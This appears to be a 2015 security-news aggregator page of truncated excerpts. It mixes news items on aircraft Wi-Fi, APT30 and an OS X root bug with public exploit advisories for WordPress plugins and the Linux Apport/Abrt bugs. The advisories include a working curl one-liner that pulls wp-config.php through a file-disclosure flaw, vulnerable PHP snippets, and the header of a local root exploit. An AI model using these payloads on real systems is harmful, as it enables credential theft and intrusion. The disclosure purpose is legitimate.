Hackers Could Commandeer New Planes Through Passenger Wi-Fi

17 April 2015 - Source: http://www.mondounix.com

Seven years after the Federal Aviation Administration first warned Boeing that its new Dreamliner aircraft had a Wi-Fi design that made it vulnerable to hacking, a new government report suggests the passenger jets might still be vulnerable.

Boeing 787 Dreamliner jets, as well as Airbus A350 and A380 aircraft, have Wi-Fi passenger networks that use the same network as the avionics systems of the planes, raising the possibility that a hacker could hijack the navigation system or commandeer the plane through the in-plane network, according to the US Government Accountability Office, which released a report about the planes today.

A hacker would...


WordPress Fusion Engage Local File Disclosure

16 April 2015 - Source: http://www.mondounix.com
Fusion Engage is a commercial WordPress plugin sold by internet marketer (and known scammer) Precious Ngwu to.. I'm actually not sure. Something to do with video embedding.
 
Anyway, it has a LFD. Here's the relevant code..
 
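function fe_get_sv_html(){
    global $wpdb, $video_db, $ann_db;

    // Reads whatever path the request supplies in 'video', with no validation
    print(file_get_contents($_POST['video']));

    wp_die();
}
// Registered for both unauthenticated (nopriv) and authenticated AJAX requests
add_action('wp_ajax_nopriv_fe_get_sv_html', 'fe_get_sv_html');
add_action('wp_ajax_fe_get_sv_html', 'fe_get_sv_html');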
 
So, you can exploit it easily... quick curl one-liner to get wp-config.php:
curl --data "action=fe_get_sv_html&video=../wp-config.php" "http://exploitable-site/wp-admin/admin-ajax.php"
 
Precious...


WordPress Duplicator 0.5.14 Cross Site Request Forgery / SQL Injection

16 April 2015 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://lifeinthegrid.com/labs/duplicator/
# Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip
# Date : 2015-04-08
# Tested on : Linux / Mozilla Firefox
######################
 
# Description
 
 Wordpress Duplicator 0.5.14 suffers from remote SQL Injection Vulnerability
 
 
 Location file: /view/actions.php
 
 This is the bugged ajax functions wp_ajax_duplicator_package_delete:
 
 function duplicator_package_delete() {
 
  DUP_Util::CheckPermissions('export');
 
...


WordPress Windows Desktop And iPhone Photo Uploader File Upload

16 April 2015 - Source: http://www.mondounix.com
##################################################################################################
#Exploit Title : Wordpress plugin Windows Desktop and iPhone Photo Uploader arbitrary file upload vulnerability
#Author        : Manish Kishan Tanwar AKA error1046
#Home Page     : https://wordpress.org/plugins/i-dump-iphone-to-wordpress-photo-uploader/
#Download Link : https://downloads.wordpress.org/plugin/i-dump-iphone-to-wordpress-photo-uploader.1.8.zip
#Date          : 9/04/2015
#Love to       : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi
#Discovered At : Indishell Lab
##################################################################################################
 
////////////////////////
///...


Linux Abrt / Apport Race Condition / Symlink

16 April 2015 - Source: http://www.mondounix.com
Hello, this is CVE-2015-1318 and CVE-2015-1862 (essentially the same bugs in two different implementations, apport and abrt respectively). These were discussed on the vendors list last week.
 
If the first character of kern.core_pattern sysctl is a pipe, the kernel will invoke the specified program, and pass it the core on stdin. Apport (Ubuntu) and Abrt (Fedora) use this feature to analyze and log crashes.
 
Since the introduction of containers, Abrt and Apport have attempted to transparently handle namespaces by chrooting into the same root as the crashing program [1] [2]. Unfortunately, this is incorrect because root cannot safely execve() after a chroot into a user specified directory.
 
Furthermore, Abrt suffers from numerous...


Linux Apport/Abrt Local Root Exploit

15 April 2015 - Source: http://www.mondounix.com
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <elf.h>
#include <err.h>
#include <syslog.h>
#include <sched.h>
#include <linux/sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/auxv.h>
#include <sys/wait.h>
 
# warning this file must be compiled with -static
 
//
// Apport/Abrt Vulnerability Demo Exploit.
//
//  Apport: CVE-2015-1318
//  Abrt:   CVE-2015-1862
// 
//   -- taviso@cmpxchg8b.com, April 2015.
//
// $ gcc -static newpid.c
// $ ./a.out
// uid=0(root) gid=0(root) groups=0(root)
// sh-4.3# exit
// exit
//
// Hint: To...


Linux splice_write Kernel Panic

14 April 2015 - Source: http://www.mondounix.com
/* ----------------------------------------------------------------------------------------------------
 * cve-2014-7822_poc.c
 * 
 * The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file
 * which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call, 
 * as demonstrated by use of a file descriptor associated with an ext4 filesystem. 
 *
 * 
 * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
 * Works on ext4 filesystem
 * Tested on Ubuntu with 3.13 and 3.14 kernels
 * 
 * Compile with gcc -fno-stack-protector...


Chinese hacker group has been spying on governments for a decade, says FireEye

14 April 2015 - Source: http://www.mondounix.com

A CHINESE CYBER THREAT GROUP is said to have one of the longest ever cyber espionage operation histories, having spied on governments for over a decade.

The APT 30 hacker group was uncovered by security firm FireEye, which claims that it has been spying on Asia Pacific countries' governments from as far back as 2004.

FireEye said that APT 30 takes a special interest in political developments in Southeast Asia and India, and is particularly active at the time of Association of Southeast Asian Nations summits. It also focuses on regional issues and territorial disputes...


Latest version of OS X closes backdoor bug that gives root

13 April 2015 - Source: http://www.mondounix.com

For at least four years, a bug in Apple's OS X gave untrusted users—and possibly remote hackers with only limited control of their target—unfettered "root" privileges over Macs.

The vulnerability is being called a "hidden backdoor" by Emil Kvarnhammar, the security researcher who discovered the bug and privately reported it to Apple. It's probably more accurate to describe it as the equivalent of an unpublished programming interface that allowed users with admin or even lower-level standard privileges to gain root. The privilege escalation flaw was fixed in a massive security update Apple released Wednesday for the 10.10,...


WordPress Shareaholic 7.6.0.3 Cross Site Scripting

8 April 2015 - Source: http://www.mondounix.com
# Exploit Title: Shareaholic 7.6.0.3 XSS
# Date: 10-11-2014
# Software Link: https://wordpress.org/plugins/shareaholic/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9311
# Category: webapps
 
1. Description
 
ShareaholicAdmin::add_location is accessible for every registered user.
 
File: shareaholic\shareaholic.php
 
add_action('wp_ajax_shareaholic_add_location',  array('ShareaholicAdmin', 'add_location'));
 
 
$_POST['location'] is not escaped.
 
File: shareaholic\admin.php
 
public static function add_location() {
  $location = $_POST['location'];
  $app_name = $location['app_name'];
  ShareaholicUtilities::update_options(array(
...
